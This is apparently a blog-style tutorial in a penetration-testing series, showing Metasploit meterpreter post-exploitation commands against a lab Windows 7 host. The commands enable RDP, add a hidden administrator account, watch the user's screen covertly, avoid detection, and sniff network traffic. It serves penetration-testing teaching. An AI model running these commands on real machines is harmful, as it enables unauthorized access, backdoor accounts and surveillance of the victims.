当前位置:网站首页>Intranet information collection of Intranet penetration (2)
Intranet information collection of Intranet penetration (2)
2022-07-06 14:17:00 【Unknown white hat】
Catalog
Metasploit Intranet information collection
Metasploit Intranet information collection
attack kali 192.168.0.103
Drone aircraft win7 192.168.0.105
05 Open and connect 3389
see 3389 Port opening
Turn on 3389 Remote desktop
run post/windows/manage/enable_rdp
run getgui -e
You can use this command to add users on the target machine :
run getgui -u admin -p [email protected]( Some system passwords have to meet the complexity to create )
net localgroup administrators admin /add( take admin Users are added to the administrators group )
Remote connection to desktop
rdesktop -u username -p password ip
yes And then it's going to pop up GUI page ( If the user is not added to the administrator group, you cannot log in )
After logging in, you will be prompted to close win7( So we should observe whether the target plane is used in advance , In order to avoid being perceived by users to be attacked )
View remote desktop
screenshot( Intercept win7 Current screen , Check whether someone is using )
use espia
screengrab
screenshare( Get... In real time win7 The screen , Similar to the video style open in the browser )
Delete the specified account
run post/windows/manage/delete_user USERNAME=admin
06 Packet capture
Grab the bag
Load sniffer
Sniffer_interfaces
Sniffer_start 2
Sniffer_dump 2 1.cap
decode
Use auxiliary/sniffer/psnuffle
Set PCAPFILE 1.cap
exploit
边栏推荐
- Attach the simplified sample database to the SQLSERVER database instance
- 力扣152题乘数最大子数组
- Wei Shen of Peking University revealed the current situation: his class is not very good, and there are only 5 or 6 middle-term students left after leaving class
- The United States has repeatedly revealed that the yield of interest rate hiked treasury bonds continued to rise
- Strengthen basic learning records
- Network layer - simple ARP disconnection
- 7-9 make house number 3.0 (PTA program design)
- 实验八 异常处理
- HackMyvm靶机系列(4)-vulny
- 【educoder数据库实验 索引】
猜你喜欢
Strengthen basic learning records
On the idea of vulnerability discovery
Attack and defense world misc practice area (simplerar, base64stego, no matter how high your Kung Fu is, you are afraid of kitchen knives)
Strengthen basic learning records
中间件漏洞复现—apache
图书管理系统
List and data frame of R language experiment III
小程序web抓包-fiddler
Strengthen basic learning records
Renforcer les dossiers de base de l'apprentissage
随机推荐
SQL注入
SRC mining ideas and methods
Attach the simplified sample database to the SQLSERVER database instance
HackMyvm靶机系列(7)-Tron
7-1 输出2到n之间的全部素数(PTA程序设计)
内网渗透之内网信息收集(五)
强化学习基础记录
7-14 错误票据(PTA程序设计)
[MySQL database learning]
sqqyw(淡然点图标系统)漏洞复现和74cms漏洞复现
Force deduction 152 question multiplier maximum subarray
链队实现(C语言)
7-14 error ticket (PTA program design)
7-5 staircase upgrade (PTA program design)
DVWA (5th week)
记一次,修改密码逻辑漏洞实战
XSS unexpected event
Brief introduction to XHR - basic use of XHR
攻防世界MISC练习区(gif 掀桌子 ext3 )
Feature extraction and detection 14 plane object recognition